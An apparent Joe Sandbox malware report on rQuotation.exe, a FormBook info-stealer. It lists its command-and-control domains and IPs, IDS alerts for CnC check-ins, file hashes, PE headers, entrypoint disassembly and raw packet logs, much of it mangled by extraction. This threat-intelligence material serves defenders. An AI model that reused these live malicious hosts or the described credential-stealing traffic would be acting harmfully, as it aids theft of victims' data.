                                                                                                                                                                                                          http://wwd.cuxqy.com/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://www.firstevent.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://www.mirenzhibo.net/z/2273.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://www.mengyouzhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://www.theanchorage.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://www.baobaozhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://www.mirenzhibo.net/euvch/6919.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://www.mirenzhibo.net/xalca/75688.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://wwf.qqai98.cn/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://www.mirenzhibo.net/lgune/678.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.mirenzhibo.net/kjfa/69323.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.tendinite.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://wwa.niunaizhibo.cn/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://wws.moxiuzhibo.cc/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://wwg.xinxingzhibo.net/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.30.252.154 | www.llmsforrobot.xyz | United States | 36459 | GITHUBUS | true
103.106.67.112 | www.furrcali.xyz | New Zealand | 56030 | VOYAGERNET-AS-APVoyagerInternetLtdNZ | true
209.74.79.40 | www.yous.website | United States | 31744 | MULTIBAND-NEWHOPEUS | true
202.95.11.110 | www.mirenzhibo.net | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true
199.59.243.227 | 94950.bodis.com | United States | 395082 | BODIS-NJUS | false
192.186.58.31 | www.aihuzhibo.net | United States | 132721 | PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL | true
52.223.13.41 | www.techforcreators.live | United States | 8987 | AMAZONEXPANSIONGB | true
185.68.108.243 | accusolution.pro | Spain | 201446 | PROFESIONALHOSTINGES | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579601
Start date and time: 2024-12-23 04:06:24 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rQuotation.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/1@13/8
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 16
• Number of non-executed functions: 331
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                              No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                              192.30.252.154http://sniff.su/Intercepter-NG.v1.3.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • sniff.su/Intercepter-NG.v1.3.zip
                                                                                                                                                                                                                                              103.106.67.112PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.furrcali.xyz/86f0/
                                                                                                                                                                                                                                              Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                              • www.sailforever.xyz/p4rk/
                                                                                                                                                                                                                                              Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.sailforever.xyz/hshp/
                                                                                                                                                                                                                                              BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.sailforever.xyz/hshp/
                                                                                                                                                                                                                                              BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.sailforever.xyz/hshp/
                                                                                                                                                                                                                                              209.74.79.40PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.unlimitu.website/b4eq/
                                                                                                                                                                                                                                              CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.balanpoint.life/0cbv/
                                                                                                                                                                                                                                              202.95.11.110z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.mirenzhibo.net/h075/
                                                                                                                                                                                                                                              199.59.243.227https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                                                                                                                                                                                              • ww25.crewmak.ru/_tr
                                                                                                                                                                                                                                              htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • ww7.cutit.org/oxgBR?usid=27&utid=9975975645
                                                                                                                                                                                                                                              DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.969-usedcar02.shop/cfcv/
                                                                                                                                                                                                                                              z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.sorket.tech/ul4e/
                                                                                                                                                                                                                                              236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • survey-smiles.com/
                                                                                                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                              • ww7.przvgke.biz/aikqer?usid=23&utid=8062768193
                                                                                                                                                                                                                                              Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.deadshoy.tech/0sq9/
                                                                                                                                                                                                                                              new.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.vavada-official.buzz/emhd/
                                                                                                                                                                                                                                              PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.sob.rip/tp8k/
                                                                                                                                                                                                                                              SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                                              • ww1.hbohbomax.com/
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              No context
Process: C:\Windows\SysWOW64\NETSTAT.EXE
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.966566616705462
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:rQuotation.exe
                                                                                                                                                                                                                                              File size:289'280 bytes
                                                                                                                                                                                                                                              MD5:d5828dcadc44bcdb74450e5a47118e5e
                                                                                                                                                                                                                                              SHA1:1a83aade8a8eca25a9d4e92323ca22dd9401c531
                                                                                                                                                                                                                                              SHA256:86f08a9f25687299366871821a8b14e11a406a4b83ece1711355505ad4dc1866
                                                                                                                                                                                                                                              SHA512:1735574c2f5d92ab83e65ea04ee4c2966107eed478e90a479d42d5d1b4c98e6cfaa9129050553816cbe3873147466812db98a737397f9067bb75c9b3d2f38ec2
                                                                                                                                                                                                                                              SSDEEP:6144:UgVJ4mtlFOkx2aVFsR3e5BsWN/Qd1Hadel2lbZCGjPv:zJlFO4VqOvwta06X
                                                                                                                                                                                                                                              TLSH:E95423139181AB32FB1151F953AB1136CE9DFF1B5B414B807929099EEDA33371A6C32E
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L....Ny`.................X..........@........p....@................
                                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                              Entrypoint:0x401440
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x60794EC4 [Fri Apr 16 08:45:56 2021 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                                              sub esp, 000003A4h
                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                              push 00000398h
                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-000003A0h]
                                                                                                                                                                                                                                              push 00000000h
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              mov dword ptr [ebp-000003A4h], 00000000h
                                                                                                                                                                                                                                              call 00007FB394D0C23Ch
                                                                                                                                                                                                                                              add esp, 0Ch
                                                                                                                                                                                                                                              xor esi, esi
                                                                                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                                                                                              mov eax, 000000F9h
                                                                                                                                                                                                                                              mov ecx, 00000859h
                                                                                                                                                                                                                                              xor edi, edi
                                                                                                                                                                                                                                              mov dword ptr [ebp-04h], 00004D3Ch
                                                                                                                                                                                                                                              mov edx, 00007766h
                                                                                                                                                                                                                                              mov dword ptr [ebp-08h], 000000D3h
                                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                                              cmp eax, 000000D3h
                                                                                                                                                                                                                                              cmovnle eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                              dec edx
                                                                                                                                                                                                                                              jne 00007FB394D0A826h
                                                                                                                                                                                                                                              lea esp, dword ptr [esp+00h]
                                                                                                                                                                                                                                              mov eax, 92492493h
                                                                                                                                                                                                                                              imul ecx
                                                                                                                                                                                                                                              add edx, ecx
                                                                                                                                                                                                                                              sar edx, 04h
                                                                                                                                                                                                                                              mov ecx, edx
                                                                                                                                                                                                                                              shr ecx, 1Fh
                                                                                                                                                                                                                                              add ecx, edx
                                                                                                                                                                                                                                              jne 00007FB394D0A81Dh
                                                                                                                                                                                                                                              call 00007FB394D0C4DBh
                                                                                                                                                                                                                                              mov dword ptr [ebp-48h], eax
                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              push 00003CCCh
                                                                                                                                                                                                                                              call 00007FB394D0A517h
                                                                                                                                                                                                                                              add esp, 08h
                                                                                                                                                                                                                                              mov ecx, 00000058h
                                                                                                                                                                                                                                              mov eax, AC769185h
                                                                                                                                                                                                                                              imul ecx
                                                                                                                                                                                                                                              add edx, ecx
                                                                                                                                                                                                                                              sar edx, 06h
                                                                                                                                                                                                                                              mov ecx, edx
                                                                                                                                                                                                                                              shr ecx, 1Fh
                                                                                                                                                                                                                                              add ecx, edx
                                                                                                                                                                                                                                              jne 00007FB394D0A81Dh
                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-70h]
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              push 00005676h
                                                                                                                                                                                                                                              call 00007FB394D0A4ECh
                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-70h]
                                                                                                                                                                                                                                              push 0C397C98h
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              call 00007FB394D0AE3Eh
                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                              • [C++] VS2012 build 50727
                                                                                                                                                                                                                                              • [ASM] VS2012 build 50727
                                                                                                                                                                                                                                              • [LNK] VS2012 build 50727
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x45764 | 0x45800 | 924d855fb38c00ac133d311bcbae1d0c | False | 0.9901676315197842 | data | 7.9961506950995505 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T04:08:06.153570+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 52.223.13.41 | 80 | TCP
2024-12-23T04:08:23.474747+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49754 | 192.30.252.154 | 80 | TCP
2024-12-23T04:08:26.138223+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49760 | 192.30.252.154 | 80 | TCP
2024-12-23T04:08:28.793205+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49766 | 192.30.252.154 | 80 | TCP
2024-12-23T04:08:31.455127+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49772 | 192.30.252.154 | 80 | TCP
2024-12-23T04:08:38.333889+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49788 | 209.74.79.40 | 80 | TCP
2024-12-23T04:08:41.037762+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49797 | 209.74.79.40 | 80 | TCP
2024-12-23T04:08:43.781516+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49805 | 209.74.79.40 | 80 | TCP
2024-12-23T04:08:46.361069+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49811 | 209.74.79.40 | 80 | TCP
2024-12-23T04:08:53.588934+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49827 | 202.95.11.110 | 80 | TCP
2024-12-23T04:08:56.260635+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49836 | 202.95.11.110 | 80 | TCP
2024-12-23T04:08:58.932562+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49842 | 202.95.11.110 | 80 | TCP
2024-12-23T04:09:01.789855+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49850 | 202.95.11.110 | 80 | TCP
2024-12-23T04:09:17.847715+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49889 | 199.59.243.227 | 80 | TCP
2024-12-23T04:09:20.511273+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49897 | 199.59.243.227 | 80 | TCP
2024-12-23T04:09:23.180910+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49903 | 199.59.243.227 | 80 | TCP
2024-12-23T04:09:25.825097+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49909 | 199.59.243.227 | 80 | TCP
2024-12-23T04:09:33.057642+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49928 | 192.186.58.31 | 80 | TCP
2024-12-23T04:09:35.713860+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49935 | 192.186.58.31 | 80 | TCP
2024-12-23T04:09:38.370315+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49942 | 192.186.58.31 | 80 | TCP
2024-12-23T04:09:41.161466+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49948 | 192.186.58.31 | 80 | TCP
2024-12-23T04:09:49.229653+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49969 | 103.106.67.112 | 80 | TCP
2024-12-23T04:09:51.885890+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49974 | 103.106.67.112 | 80 | TCP
2024-12-23T04:09:54.542108+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49980 | 103.106.67.112 | 80 | TCP
2024-12-23T04:09:57.792650+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49988 | 103.106.67.112 | 80 | TCP
2024-12-23T04:10:05.153667+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50007 | 185.68.108.243 | 80 | TCP
2024-12-23T04:10:07.867470+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50016 | 185.68.108.243 | 80 | TCP
2024-12-23T04:10:10.523001+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 185.68.108.243 | 80 | TCP
2024-12-23T04:10:13.179553+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50030 | 185.68.108.243 | 80 | TCP
2024-12-23T04:10:20.552836+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50031 | 52.223.13.41 | 80 | TCP
2024-12-23T04:10:23.216474+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 52.223.13.41 | 80 | TCP
2024-12-23T04:10:25.875769+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 52.223.13.41 | 80 | TCP
2024-12-23T04:10:28.813593+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50034 | 52.223.13.41 | 80 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.861411095 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.866223097 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.866338015 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.866406918 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.871231079 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.871366978 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.871436119 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.876241922 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.876343012 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.876432896 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.881083012 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.881383896 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.881448030 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.901376963 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:24.919543982 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:25.039271116 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:25.039370060 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:25.051013947 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:25.170574903 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138079882 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138154984 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138209105 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138222933 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138242960 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138298988 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138299942 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138334036 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138369083 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138392925 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138402939 CET8049760192.30.252.154192.168.2.4
